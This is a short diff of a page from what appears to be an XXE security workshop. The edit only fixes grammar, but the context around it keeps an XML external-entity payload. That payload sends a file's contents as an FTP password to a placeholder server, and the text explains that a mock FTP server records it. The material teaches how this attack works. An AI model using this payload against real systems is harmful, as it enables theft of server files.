GoSecure/xxe-workshop/codelabs/index.md

 <!ENTITY % all "<!ENTITY send SYSTEM 'ftp://test:%file;@my.ftp.server/'>"> %all;
 ```

 In order to capture the file content, you need to record the password sent to your FTP server.
-To serve this purpose, Ivan Novikov has created [a mock FTP server](http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html) that respond just enough to record password.
-(FTP client will not authenticate if the handshake is incomplete.)
+To serve this purpose, Ivan Novikov has created [a mock FTP server](http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html) that respond just enough to record a password.
+(FTP clients will not authenticate if the handshake is incomplete.)